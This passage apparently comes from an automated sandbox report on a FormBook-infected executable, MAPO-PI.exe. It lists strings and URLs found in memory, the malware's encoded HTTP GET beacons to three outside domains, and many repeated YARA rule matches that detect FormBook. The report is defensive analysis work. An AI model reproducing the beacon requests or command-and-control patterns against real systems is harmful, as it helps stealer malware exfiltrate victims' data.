63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#logo
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#organization
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#website
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/elma-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/maydanoz-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/meyve-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi-2/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/rahatlatici-cay/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/yulafli-kahvalti/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/cennet-tatlisi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/cikolatali-toplar/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/ketojenik-beslenme/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/19/aspir-yagi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/?s=
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/bize-ulasin/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/blog/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/guncel-diyet-meseleleri/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/sporcu-beslenmesi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/tarifler/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/comments/feed/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/feed/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hakkimizda/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/partnerlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-json/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://api.w.org/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://m0n.co/ga
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://schema.org
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.monsterinsights.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
          Source: unknownDNS traffic detected: queries for: www.lifeinformpodcast.com
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: MAPO-PI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
